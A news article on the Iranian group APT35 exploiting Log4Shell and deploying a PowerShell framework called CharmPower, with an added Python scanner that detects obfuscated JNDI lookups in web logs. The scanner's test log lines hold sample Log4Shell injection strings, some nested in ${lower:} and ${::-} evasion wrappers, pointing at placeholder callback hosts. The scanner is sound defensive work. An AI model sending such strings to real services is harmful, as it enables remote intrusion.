An Iranian state-sponsored hacking group has been found actively exploiting Apache Log4j vulnerabilities to deliver a new modular PowerShell toolkit.
Detailed on Tuesday by researchers at Check Point Software Technologies Ltd., the APT35 hacking group, also known as Phosphorus and Charming Kitten, was first observed exploiting Log4j just four days after the first vulnerability was disclosed. The researchers describe the attack setup as rushed: the group used only a basic open-source JNDI exploit kit rather than custom tooling.
Having gained access to a vulnerable service, the Iranian hackers then deployed a new PowerShell-based modular framework that Check Point dubbed “CharmPower”. The script is used to establish persistence, collect information and run commands.
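The initial access described above relies on an attacker getting a Log4j lookup string such as `${jndi:ldap://...}` (the Log4Shell pattern, CVE-2021-44228) into a field that the target logs, and the public JNDI exploit kits commonly wrap that string in Log4j's `${lower:...}` and `${...:-x}` lookups to evade naive matching. The following scanner is an added example (not code from the article or from Check Point's report) that normalizes those common obfuscations and URL encoding before matching, and runs over constructed web-server log lines; the callback hosts and file names in the sample lines are made up for illustration.

```python
import re
from urllib.parse import unquote

# Constructed access-log lines for the example; none of these come from the
# article or from any real incident. Line 1 and line 6 are benign.
SAMPLE_LOGS = [
    '10.0.0.5 - - [14/Dec/2021:10:01:02 +0000] "GET / HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [14/Dec/2021:10:01:07 +0000] "GET / HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.10:1389/a}"',
    '10.0.0.9 - - [14/Dec/2021:10:01:09 +0000] "GET /?x=${${lower:j}ndi:${lower:l}dap://198.51.100.10:1389/b} HTTP/1.1" 404 0 "-" "curl/7.79"',
    '10.0.0.9 - - [14/Dec/2021:10:01:11 +0000] "GET / HTTP/1.1" 200 512 "-" "${${::-j}${::-n}${::-d}${::-i}:rmi://198.51.100.10:1099/c}"',
    '10.0.0.9 - - [14/Dec/2021:10:01:13 +0000] "GET /?q=%24%7Bjndi%3Adns%3A%2F%2Fx.example%7D HTTP/1.1" 200 12 "-" "-"',
    '10.0.0.7 - - [14/Dec/2021:10:01:15 +0000] "GET /?s=${price} HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
]

# ${anything:-default}  ->  default   (Log4j default-value syntax, e.g. ${::-j})
_DEFAULT = re.compile(r'\$\{[^${}]*?:-([^${}]*)\}')
# ${lower:x} / ${upper:x}  ->  x      (case-conversion lookups used for obfuscation)
_CASE = re.compile(r'\$\{(?:lower|upper):([^${}]*)\}', re.IGNORECASE)
# After normalization: ${jndi:<scheme>://<host[:port]>...}
_JNDI = re.compile(r'\$\{\s*jndi\s*:\s*(\w+)\s*:/*([^/}\s]*)', re.IGNORECASE)


def normalize(text: str, max_rounds: int = 10) -> str:
    """Undo URL encoding and the common Log4j lookup obfuscations, innermost first.

    Each round strips one layer; looping handles nested wrappers. The round cap
    bounds work on adversarial input that never converges.
    """
    for _ in range(max_rounds):
        prev = text
        text = unquote(text)
        text = _DEFAULT.sub(r'\1', text)
        text = _CASE.sub(r'\1', text)
        if text == prev:
            break
    return text


def scan(lines):
    """Return one record per log line that carries a JNDI lookup after normalization."""
    hits = []
    for number, line in enumerate(lines, start=1):
        match = _JNDI.search(normalize(line))
        if match:
            hits.append({
                "line": number,
                "scheme": match.group(1).lower(),   # ldap, rmi, dns, ...
                "callback": match.group(2),         # attacker-controlled host[:port]
                "raw": line,
            })
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_LOGS):
        print(f"line {hit['line']}: jndi via {hit['scheme']} -> {hit['callback']}")
```

The normalization is deliberately narrow: it handles the default-value and case-conversion wrappers that the common public kits emit, not every Log4j lookup (`${env:...}`, `${sys:...}`, `${date:...}` and others can be abused the same way). A looser tripwire for triage is simply any `${` whose normalized form contains `jndi`, at the cost of more false positives; the `callback` field is what to pivot on in egress and DNS logs, since a vulnerable host that resolved or connected to it was likely exploited.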
CharmPower has four main initial modules. The first validates network connectivity, and the second gathers basic system information such as the Windows version, computer name and the contents of various system files. The third module decodes the command-and-control domain, which is retrieved from a hard-coded URL pointing at an Amazon Web Services Inc. S3 bucket, while the final module receives, decrypts and executes the follow-on modules.
Based on the information gathered by the initial deployment, APT35 then pushes additional custom modules to facilitate data theft and hide its presence on the infected machine.
APT35 is a well-known hacking group that has previously been linked to attacks in 2020 targeting the Trump campaign, current and former US government officials, journalists covering global politics and prominent Iranians living outside Iran. The group also targeted the Munich Security Conference later that same year.
“Research linking the exploitation of Log4Shell to the Iranian APT Charming Kitten coincides, and somewhat conflicts, with a statement made by the US Cybersecurity Infrastructure and Security Agency on January 10 which suggested that there had been no significant bug-related intrusion at that time,” Chris Morgan, principal cyber threat intelligence analyst at digital risk solutions provider Digital Shadows Ltd., told SiliconANGLE. “This likely highlights the ongoing issues of incident disclosure and transparency, and the lag that can exist between threat actor activity and threat discovery.”
John Bambenek, lead threat hunter at IT services management company Netenrich Inc., said it’s no surprise that second-tier nation-state actors are leveraging the opportunity presented by the Log4j vulnerability in a rushed way.
“Any feat of this gravity would be grabbed by anyone looking to gain a foothold quickly and sometimes tactical windows open up like this which means you have to act fast,” Bambenek said. “The bigger question is, which intelligence agency was using this before the vulnerability was made public?”
News that Iranian hackers were exploiting Log4j vulnerabilities came as US Cyber Command’s Cyber National Mission Force disclosed that it had identified several open-source tools that Iranian intelligence actors use in networks around the world.
The disclosure concerned an Iranian state-sponsored hacking group dubbed “MuddyWater”. The group has been linked to Iran’s Ministry of Intelligence and Security and mainly targets other countries in the Middle East and occasionally countries in Europe and North America.